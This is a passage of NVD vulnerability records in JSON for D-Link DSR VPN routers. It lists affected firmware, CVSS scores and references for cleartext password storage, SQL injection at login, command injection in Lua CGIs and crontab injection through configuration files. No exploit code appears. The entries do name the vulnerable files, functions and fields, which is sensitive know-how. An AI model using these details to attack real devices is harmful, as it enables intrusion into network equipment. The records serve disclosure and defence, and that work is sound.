              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C3F3332-EEE2-492F-9585-62E4256ECBC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "0DE1C593-B0E7-4715-9AA5-CF7A3A87F05E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "2D4D1637-5291-45CD-BA6A-B71D9199F0F2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "25136989-A83E-4C65-A354-8A0E2101EE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "36E387CF-AAE4-4EED-A7E2-6D2FE9B5933F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#][\"Password\"] fields in /tmp/teamf1.cfg.ascii."
    },
    {
      "lang": "es",
      "value": "D-Link DSR-150 con firmware anterior a 1.08B44; DSR-150N con firmware anterior a 1.06B64; DSR-250 y DSR-250N con firmware anterior a 1.08B44; y DSR-500, DSR-500N, DSR-1000 y DSR-1000N con firmware anterior a 1.08B77, almacena contrase\u00f1as de cuentas en texto plano, lo cual permite a usuarios locales obtener informaci\u00f3n sensible leyendo los campos Users[#][\"Password\"] en /tmp/teamf1.cfg.ascii."
    }
  ],
  "id": "CVE-2013-7005",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "LOCAL",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.9,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "NONE",
          "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-12-19T04:24:57.493",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-12-15 20:15
Modified
2024-11-21 05:18
Summary
A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C5755D-5EB7-449E-81D9-20DBA0F36345",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3AE6313B-F71A-4AE4-8778-E30A93B1942B",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1ABEF03D-2411-4B84-BB67-831DC0164C9D",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "834CDDBF-DC00-40FD-86C1-9AF2A42BB317",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "64D78EB2-B98D-4196-B678-BF43227770F2",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A56B78EB-01FB-472A-B147-F2DF9E1C70E1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC42D575-0178-43EF-814F-DE6D738FB2A5",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC082E6B-E33F-4A69-A9B7-5E4D2D03C996",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "19A81670-E7DA-4179-A0A5-00938299BF6C",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "82F0849C-8622-4839-BE2B-DCDE9CE7B257",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7F64A55-D6BF-4440-8336-22E5C1BF36D0",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3DD4F77B-72B4-4261-884C-8F17B52A4643",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17."
    },
    {
      "lang": "es",
      "value": "Una falta de comprobaci\u00f3n de entrada y controles de acceso en Lua CGI en enrutadores D-Link DSR VPN, puede resultar en una entrada arbitraria que es pasada a las API de comando del sistema, resultando en una ejecuci\u00f3n de comandos arbitrarios con privilegios root. Esto afecta a DSR-150, DSR-250, DSR-500 y DSR-1000AC con versiones de firmware 3.14 y 3.17."
    }
  ],
  "id": "CVE-2020-25757",
  "lastModified": "2024-11-21T05:18:40.930",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "ADJACENT_NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 8.3,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 6.5,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "ADJACENT_NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-12-15T20:15:16.183",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.dlink.com/en/security-bulletin"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.dlink.com/en/security-bulletin"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-02-11 12:15
Modified
2024-11-21 01:58
Severity ?
Summary
Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BD73A85-9D52-4389-A555-D6FDB737AE59",
              "versionEndExcluding": "1.08b44",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6953E43-A7B5-4F35-BF7D-CE75FB2FA96D",
              "versionEndExcluding": "1.05b64",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "51C91D3D-52F0-405F-B652-45DFC3C0C673",
              "versionEndExcluding": "1.08b44",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6763ED3-B6F2-4BC4-88DC-DDF383A40761",
              "versionEndExcluding": "1.08b44",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E80E081B-1FB5-4B37-A054-7F6D3A507B47",
              "versionEndExcluding": "1.08b77",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C49E10FB-39AA-4193-8EFE-815EE72ADA6E",
              "versionEndExcluding": "1.08b77",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C7AF3E-A7B6-47D6-A3DD-26E28398843B",
              "versionEndExcluding": "1.08b77",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F33EBB05-D58C-47C0-9EB7-D0F03C027169",
              "versionEndExcluding": "1.08b77",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de inyecci\u00f3n SQL en dispositivos D-Link DSR-150 con versi\u00f3n de firmware anterior a 1.08B44; DSR-150N con versiones de firmware anteriores a 1.05B64; DSR-250 y DSR-250N con versiones de firmware anteriores a 1.08B44; y DSR-500, DSR-500N, DSR-1000 y DSR-1000N con versiones de firmware anteriores a 1.08B77, permiten a atacantes remotos ejecutar comandos SQL arbitrarios por medio de la contrase\u00f1a para (1) la funci\u00f3n login.authenticate en los archivos share/lua/5.1/teamf1lualib/login.lua o (2) captivePortal.lua."
    }
  ],
  "id": "CVE-2013-5945",
  "lastModified": "2024-11-21T01:58:28.210",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-02-11T12:15:11.757",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-12-15 20:15
Modified
2024-11-21 05:18
Summary
An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C5755D-5EB7-449E-81D9-20DBA0F36345",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3AE6313B-F71A-4AE4-8778-E30A93B1942B",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1ABEF03D-2411-4B84-BB67-831DC0164C9D",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "834CDDBF-DC00-40FD-86C1-9AF2A42BB317",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "64D78EB2-B98D-4196-B678-BF43227770F2",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A56B78EB-01FB-472A-B147-F2DF9E1C70E1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC42D575-0178-43EF-814F-DE6D738FB2A5",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC082E6B-E33F-4A69-A9B7-5E4D2D03C996",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
